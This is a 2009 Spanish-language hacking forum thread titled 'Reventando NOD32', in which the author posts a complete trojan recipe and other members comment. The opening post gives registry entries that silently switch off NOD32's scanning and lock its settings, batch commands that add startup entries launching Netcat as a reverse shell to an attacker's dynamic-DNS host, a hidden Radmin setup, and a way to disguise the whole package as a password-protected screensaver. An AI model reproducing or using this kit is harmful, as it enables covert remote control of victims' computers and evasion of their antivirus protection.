elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
19 Marzo 2010, 02:38  


Temas destacados: Suscripción al boletín mensual de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Hendrix, Karcrack)
| | |-+  Reventando NOD32		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: Reventando NOD32  (Leído 1888 veces)
mytnick

Desconectado Desconectado

Mensajes: 58



Ver Perfil WWW
Reventando NOD32
« en: 19 Noviembre 2009, 02:07 »
Uno de los más prestigiosos antivirus queda al desnudo con algunos archivos en BATCH, lo desactivaremos para que no detecte nada, pero seguirá corriendo como si estuviera haciendo su trabajo para no levantar sospechas.

Nota: Estas pruebas no son efectivas en Windows VISTA, ya que se necesitan privilegios de Administrador, todo el proceso descrito se hace bajo Windows XP.

Nota: Mi objetivo es tan solo desmostrar la inseguridad del antivirus, por ello no entraré en detalles técnicos y/o especificos.

Para modificar o manipular este antivirus solo hay que agregar las entradas correspondientes al registro de Windows, así de simple!!. Crearemos algunos Batch para realizar el proceso, ocultaremos Netcat y Radmin en un salvapantallas corriente de windows y lo dejaremos corriendo invisible a la heuristica de Nod32.

Crearemos un archivo autoextraible que copie y ejecute Netcat y Radmin al arrancar, a este archivo le pondremos contraseña para evitar ser detectado en un escaneo, agregamos una entrada al registro que lo ejecute en cada arranque, que se encargará de verificar si existe o no los programas "N & R" para posteriormente copiarlos si hubieran sido eliminados.
Arrancaremos Netcat en cada reinicio para que se conecte al "PC atacante" devolviendonos una Reverse Shell para determinar la IP del "PC vicitima" y conectarse seguidamente con Radmin.

El archivo que se encargará de modificar Nod32 será un archivo "REG" como este:

Citar
Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:cf345a34


[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Settings]
"exc"=hex:54,00,00,00,5c,00,44,00,65,00,76,00,69,00,63,00,65,00,5c,00,48,00,61,\
  00,72,00,64,00,64,00,69,00,73,00,6b,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,\
  31,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,53,00,59,00,53,\
  00,54,00,45,00,4d,00,33,00,32,00,5c,00,00,00,00,00,00,00,01,00,66,00,00,00,\
  5c,00,44,00,65,00,76,00,69,00,63,00,65,00,5c,00,48,00,61,00,72,00,64,00,64,\
  00,69,00,73,00,6b,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,31,00,5c,00,57,00,\
  49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,53,00,59,00,53,00,54,00,45,00,4d,\
  00,33,00,32,00,5c,00,57,00,49,00,4e,00,33,00,32,00,2e,00,45,00,58,00,45,00,\
  00,00,01,00,00,00,01,00,68,00,00,00,5c,00,44,00,65,00,76,00,69,00,63,00,65,\
  00,5c,00,48,00,61,00,72,00,64,00,64,00,69,00,73,00,6b,00,56,00,6f,00,6c,00,\
  75,00,6d,00,65,00,31,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,\
  00,53,00,59,00,53,00,54,00,45,00,4d,00,33,00,32,00,5c,00,52,00,41,00,44,00,\
  44,00,52,00,56,00,2e,00,44,00,4c,00,4c,00,00,00,01,00,00,00,01,00,68,00,00,\
  00,5c,00,44,00,65,00,76,00,69,00,63,00,65,00,5c,00,48,00,61,00,72,00,64,00,\
  64,00,69,00,73,00,6b,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,31,00,5c,00,57,\
  00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,53,00,59,00,53,00,54,00,45,00,\
  4d,00,33,00,32,00,5c,00,41,00,44,00,4d,00,44,00,4c,00,4c,00,2e,00,44,00,4c,\
  00,4c,00,00,00,01,00,00,00,01,00,6a,00,00,00,5c,00,44,00,65,00,76,00,69,00,\
  63,00,65,00,5c,00,48,00,61,00,72,00,64,00,64,00,69,00,73,00,6b,00,56,00,6f,\
  00,6c,00,75,00,6d,00,65,00,31,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,\
  53,00,5c,00,53,00,59,00,53,00,54,00,45,00,4d,00,33,00,32,00,5c,00,57,00,49,\
  00,4e,00,4d,00,50,00,4c,00,43,00,2e,00,45,00,58,00,45,00,00,00,01,00,00,00,\
  01,00,ff,ff,ff,ff
"exc_num"=dword:00000005


[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Settings]
"check_on_open"=dword:00000000
"check_on_execute"=dword:00000000
"cache_enable"=dword:00000000
"media_local"=dword:00000000
"boot_on_access"=dword:00000000
"sec_clean"=dword:00000000
"sec_delete"=dword:00000000
"sec_rename"=dword:00000000
"sec_replace"=dword:00000000
"manualstop_enabled"=dword:00000000
"autorun_dynamic"=dword:00000000


[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Scanner]
"signatures_enable"=dword:00000000
"adv_heur_enable"=dword:00000000
"scan_app_adware"=dword:00000000
"scan_app_unsafe"=dword:00000000
"scan_app_unwanted"=dword:00000000
"log_all"=dword:00000000
"target_file_action"=dword:00000000
"target_file_uncl_action"=dword:00000000
"target_boot_action"=dword:00000000
"target_boot_uncl_action"=dword:00000000
"target_arch_enable"=dword:00000000
"target_sfx_enable"=dword:00000000
"target_rtp_enable"=dword:00000000
"target_mime_enable"=dword:00000000
"target_mbx_enable"=dword:00000000


valores para netcat:

Citar
reg add hklm\software\microsoft\windows\currentversion\run /v winmplc /d "%homedrive%\WINDOWS\system32\winmplc.exe -d -e cmd.exe direccion.no-ip.org 5010" /f


valores para Radmin:

Citar
reg add hklm\software\microsoft\windows\currentversion\run /v winmplc32 /d "%homedrive%\WINDOWS\system32\win32.exe" /f

reg add hklm\system\Radmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f

reg add hklm\system\Radmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d 88130000 /f

reg add hklm\system\Radmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d 50026e56ac6dda6644b51d7b2e11dc16 /f
De arriba a abajo: 1º Arranca Radmin, 2º Oculta icono, 3º Puerto a usar, 4º Contraseña de Radmin

El Batch que usaré es el siguiente:

Citar
@echo off
regedit /s reguserinfo.reg

reg add hklm\software\microsoft\windows\currentversion\run /v FluxScreensaver /d "%homedrive%\WINDOWS\system32\Flux-config.exe -pm0rtoz7l26sk38xq" /f

reg add hklm\software\microsoft\windows\currentversion\run /v winmplc /d "%homedrive%\WINDOWS\system32\winmplc.exe -d -e cmd.exe direccion.no-ip.org 5010" /f

reg add hklm\software\microsoft\windows\currentversion\run /v winmplc32 /d "%homedrive%\WINDOWS\system32\win32.exe" /f

reg add hklm\system\Radmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f

reg add hklm\system\Radmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d 88130000 /f

reg add hklm\system\Radmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d 50026e56ac6dda6644b51d7b2e11dc16 /f

del /f /q %homedrive%\windows\system32\flux-config.cmd

del /f /q %homedrive%\windows\system32\flux-confg.cmd

Yo en este caso no he compilado el Batch a EXE, he usado un script en vbs para ocultar la ventana de la consola.
El script es el siguiente:

Citar
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


Resumiendo:

Creamos un batch y un archivo reg, junto con Netcat, Radmin y un salvapantallas corriente (todo en la misma carpeta) lo comprimimos y configuramos para que se ejecute el batch, a este archivo le ponemos contraseña para no ser detectado en un escaneo.
Volvemos a comprimir este archivo junto con el salvapantallas para crear un solo archivo con extensión .scr que ejecute ambos archivos.
Al ejecutarlo se mostrará el salvapantallas normalmente, se desactivará NOD32 y copiará el archivo comprimido con contraseña en system32.
Trás reiniciar se ejecutará y extraerá Radmin y Netcat en system32, NOD32 sigue desactivado, (funcionando pero como si no lo estuviera), en este punto del proceso el antivirus ya no detecta NADA!! y tenemos "N & R" esperando a ser ejecutados en el proximo reinicio.
Tras volver a reiniciar N & R corren con normalidad,NOD32 sigue funcionando como si nada pasara y por muchos escaneos que se haga nunca los detectará, tambien le pusimos contraseña a Nod32 para que no se pudiera ver y/o configurar nada, en el archivo reg, este es el valor:

Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:cf345a34


Yo en este caso he optado por dejar funcionando el antivirus, pero se puede desactivar por completo, se puede hacer con él lo que se venga en gana, solo hay que saber el valor correspondiente en el registro.

Algunos valores importantes

Desactivar Servicio:

Citar
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AMON]
"Start"=dword:00000003
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AMON]
"Start"=dword:00000003

Activar Servicio:

Citar
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AMON]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AMON]
"Start"=dword:00000002

Desactivarlo todo dejando activo el antivirus:

Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Settings]
"SP"="C:\\Archivos de programa\\Eset\\"
"check_on_open"=dword:00000000
"check_on_execute"=dword:00000000
"cache_enable"=dword:00000000
"media_local"=dword:00000000
"boot_on_access"=dword:00000000
"sec_clean"=dword:00000000
"sec_delete"=dword:00000000
"sec_rename"=dword:00000000
"sec_replace"=dword:00000000
"manualstop_enabled"=dword:00000000
"autorun_dynamic"=dword:00000000
"exc_num"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Modules\AMON\Settings\Config000\Scanner]
"signatures_enable"=dword:00000000
"adv_heur_enable"=dword:00000000
"scan_app_adware"=dword:00000000
"scan_app_unsafe"=dword:00000000
"scan_app_unwanted"=dword:00000000
"log_all"=dword:00000000
"target_file_action"=dword:00000000
"target_file_uncl_action"=dword:00000000
"target_boot_action"=dword:00000000
"target_boot_uncl_action"=dword:00000000
"target_arch_enable"=dword:00000000
"target_sfx_enable"=dword:00000000
"target_rtp_enable"=dword:00000000
"target_mime_enable"=dword:00000000
"target_mbx_enable"=dword:00000000

Poner contraseña:

Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:cf345a34

Quitar contraseña:

Citar
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\NOD\CurrentVersion\Info]
"PackageID"=dword:68DBAF89


Nada mejor que un video para entender el proceso


by Mytnick

Saludos!!
« Última modificación: 19 Noviembre 2009, 05:27 por mytnick » En línea
Jaixxon Jax

Desconectado Desconectado

Mensajes: 755



Ver Perfil
Re: Reventando NOD32
« Respuesta #1 en: 19 Noviembre 2009, 04:19 »
  Esta bueno pero se necesita privilegios para acceder a todas esas llaves habria que ponerlo en modo latente hasta que alguien con privilegios lo ejecute por que si no tendremos una bonita excepcion  :) ...
En línea
mytnick

Desconectado Desconectado

Mensajes: 58



Ver Perfil WWW
Re: Reventando NOD32
« Respuesta #2 en: 19 Noviembre 2009, 05:26 »
Gracias por recordarlo, se me olvidó advertir de ello, ya he modificado el post.

gracias por comentar


Saludos
En línea
BlackZeroX▓▓▒▒░░

Desconectado Desconectado

Mensajes: 996



Ver Perfil WWW
Re: Reventando NOD32
« Respuesta #3 en: 19 Noviembre 2009, 06:23 »
huy sto es algo interesante y me diste una idea con lo del salvapantallas xD

Dulces Lunas!¡.
En línea
Servidor FTP Gratuito:
Subir Archivos...
Inicio -> Ejecutar
Código:
Explorer FTP://infrangelux.sytes.net/
Para navegar en http://Infrangelux.sytes.net/ftp/
No se aceptan archivos del tipo PHP, o con nombre index...

Me Vale si otros creen en la Existencia de un Dios.
The Dark Shadow is my passion.
El infierno es mi Hogar, mi novia es Lilith y el metal m
Ari-Slash

Desconectado Desconectado

Mensajes: 1.213


Made in Chile


Ver Perfil WWW
Re: Reventando NOD32
« Respuesta #4 en: 19 Noviembre 2009, 07:15 »
hola esta interesante el post   ;-)


Cita de: mytnick en 19 Noviembre 2009, 02:07
Nota: Estas pruebas no son efectivas en Windows VISTA, ya que se necesitan privilegios de Administrador, todo el proceso descrito se hace bajo Windows XP.

el detalle esta enque estas reventando el winxp, no el nod32....porque en cuaquier S.O que corras con privilegios de administrador podras hacer lo que se de la gana


pero esta exelente para un malware  ;D

salu2
En línea
http://skydrive.cl/foro

http://www.podologiafootcare.cl/
http://www.lasazon.cl
http://www.esteticaconcepcion.cl
http://www.proyectossermas.cl
http://www.centroortopedicoconcepcion.cl
Novlucker
Moderador Global
*****
Desconectado Desconectado

Mensajes: 7.297


Yo que tu lo pienso dos veces!


Ver Perfil
Re: Reventando NOD32
« Respuesta #5 en: 19 Noviembre 2009, 11:27 »
Tenía pensado hacer algo similar con algunos de los AV más conocidos, ya lo había hecho con el Microsoft Security Essentials pero sin dejar code, solo la teoría :P, pero por falta de tiempo no lo había hecho.

Muchos de los AV, por no decir la mayoría, almacena configuraciones en la rama de registro del HKLM, donde se supone que un usuario sin privilegios no podría escribir, pero se olvidan de que el 90% de los usuarios domésticos corre con usuario administrador por defecto, así que es cuestión de buscar la llave correcta para poder agregar excepciones o abrir puertos :-\

Y bueno, lo dejamos aquí en análisis de malware, tienes bastante code a modo de POC

Saludos
En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
mytnick

Desconectado Desconectado

Mensajes: 58



Ver Perfil WWW
Re: Reventando NOD32
« Respuesta #6 en: 19 Noviembre 2009, 13:30 »
Cita de: Ari-Slash en 19 Noviembre 2009, 07:15
hola esta interesante el post   ;-)


Cita de: mytnick en 19 Noviembre 2009, 02:07
Nota: Estas pruebas no son efectivas en Windows VISTA, ya que se necesitan privilegios de Administrador, todo el proceso descrito se hace bajo Windows XP.

el detalle esta enque estas reventando el winxp, no el nod32....porque en cuaquier S.O que corras con privilegios de administrador podras hacer lo que se de la gana


pero esta exelente para un malware  ;D

salu2


Discrepo, eso no es del todo cierto, sino haz la prueba siendo Administrador e intenta hacer lo mismo con Kaspersky por ejemplo, para mi el fallo es del antivirus y no del S.O.
Bueno, hice este post con la intención de mostrar algunas vulnerabilidades del NOD32, no como una forma de ataque ni detalles especificos pero te aseguro que con un poco de imaginación incluso en windows vista sin ser adminstrador se puede realizar el proceso,un poco más tedioso pero con el mismo resultado, te lo digo por experiencia.

Cita de: ░▒▓BlackZeroҖ▓▒░ en 19 Noviembre 2009, 06:23
huy sto es algo interesante y me diste una idea con lo del salvapantallas xD

Dulces Lunas!¡.
jajajajja.. te ha gustado el camuflaje del Netcat y Radmin en el salvapantallas ehh   :laugh: :laugh:

Saludos
« Última modificación: 19 Noviembre 2009, 13:35 por mytnick » En línea
Karcrack
Moderador
*****
Desconectado Desconectado

Mensajes: 1.353


Se siente observado ¬¬'


Ver Perfil
Re: Reventando NOD32
« Respuesta #7 en: 19 Noviembre 2009, 14:47 »
Muy interesante :D

Solo un apunte, y es que desde W. XP se pueden reventar TODOS los antivirus modificando la memoria fisica de los procesos protegidos ;D

A ver si tengo un rato y subo un paper que tengo sobre esto ;)
En línea
mytnick

Desconectado Desconectado

Mensajes: 58



Ver Perfil WWW
Re: Reventando NOD32
« Respuesta #8 en: 21 Noviembre 2009, 00:42 »
como consigues hacerlo?? eso eso, sube el paper, toda información es poca  :xD

que palabra más bonita...INFORMACIÓN  :rolleyes:

Yo hice esto con la intención de hacerlo imperceptible al usuario "Victima", lo vi más elegante, pero tambien está bien poder "caskár" cualquier antivirus, no demores en subirlo.

A ver si saco tiempo y preparo otro post pero de Kaspersky, que también tiene sus vulnerabilidades.

Un saludo
« Última modificación: 21 Noviembre 2009, 01:51 por mytnick » En línea
El Pollo Profeta

Desconectado Desconectado

Mensajes: 530


Y cuando llegue el momento los pollos regresaran!!


Ver Perfil WWW
Re: Reventando NOD32
« Respuesta #9 en: 21 Noviembre 2009, 03:45 »
Yo personalmente opto mass por no reventar los AV, el motivo de un Worm es infectar pero no hacer da;o alguno a la integridad del ordenador afectado, son usuarios al igual que nosotros y no deben ser castigados por los errores de las compa;ias que piensan solo en su beneficio personal y no nos brindan un buen producto
En línea
Y el clan pollo regresara, destruira todo lo que no sea correcto
Y en ese momento el Dios Pollo descendera a la tierra y destruira
Todo acto de represion contra los que apoyan su religion...
Karcrack
Moderador
*****
Desconectado Desconectado

Mensajes: 1.353


Se siente observado ¬¬'


Ver Perfil
Re: Reventando NOD32
« Respuesta #10 en: 21 Noviembre 2009, 13:36 »
Lo divertido del Malware es hacerlo imperceptible al usuario/AV :P

Por cierto, no encuentro el Paper, pero la cosa es sencilla, se trata de escribir en la PhysicalMemory del Driver del AV :P
En línea
Darioxhcx

Conectado Conectado

Mensajes: 1.617



Ver Perfil
Re: Reventando NOD32
« Respuesta #11 en: 21 Noviembre 2009, 15:42 »
Cita de: Karcrack en 21 Noviembre 2009, 13:36
Lo divertido del Malware es hacerlo imperceptible al usuario/AV :P

Por cierto, no encuentro el Paper, pero la cosa es sencilla, se trata de escribir en la PhysicalMemory del Driver del AV :P
tenia ganas de leer ese paper :¬¬
jajaja...

interesante post mytnick , safa...
saludos
En línea
xtermsh

Desconectado Desconectado

Mensajes: 182



Ver Perfil
Re: Reventando NOD32
« Respuesta #12 en: 21 Noviembre 2009, 15:53 »
Muy bueno. Ahora, en la frase final "Ningún antivirus es seguro, usa linux". No existe forma de que el malware sobreviva a un formateo? Y una pregunta más, qué pasa si te pasaron malware para abrir puertos, luego formateas instalas linux, los puertos seguirán abiertos, así que lo mejor sería utilizar linux desde un comienzo, verdad?
En línea
Darioxhcx

Conectado Conectado

Mensajes: 1.617



Ver Perfil
Re: Reventando NOD32
« Respuesta #13 en: 21 Noviembre 2009, 15:57 »
no se , depende del router ?
pueden sobrevivir a un formateo , se puede hospedar en la bios , pero es muy pro eso xD
infectarse con eso seria una verdadera mala suerte xD

y lo del inux... seguro empieza otra discusion mas x cual es mejor u.u
si instalas win , la cuenta de admin la proteges , y solo usas windows como invitado es mucho mejor , no se si siendo invitado o un usuario con permisos limitados podes editar el registro...
x eso..
saludos
En línea
mytnick

Desconectado Desconectado

Mensajes: 58



Ver Perfil WWW
Re: Reventando NOD32
« Respuesta #14 en: 21 Noviembre 2009, 17:18 »

yo pienso que después de formatear no debe de haber problemas y más aún si se instala linux.

el problema de las cuenta usuario en windows es que actualmente es el "standar" en un pc que tenga windows, millones de ordenadores corren como administrador, ahora la dificultad viene con las nuevas versiones que intentan evitar este problema, pero por desgracia es fácil de saltarse estas protecciones.

Por ejemplo, este proceso que está creado bajo XP, puede parecer que es imposible poder hacerlo en windows Vista y realmente se puede de igual manera solo que hay que hacer algunas cosillas más y tener un poco de imaginación.

La cuestión aparte del sistema, es el antivirus, aún siendo adminstrador no debería poderse manipular/configurar el programa de esta manera, sin ir más lejos...intenta hacer todo esto "siendo Administrador" con Kaspersky, todo será en vano.

¿¿como es posible que no sea seguro el programa que se encarga de la seguridad??
En línea
Páginas: [1] 2 Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Yashira.org    Videojuegos    indetectables.net    Seguridad Informatica Colombia    Indejuegos    Internet móvil

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec    Seguridad Wireless    Underground México    Biblioteca de Seguridad

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC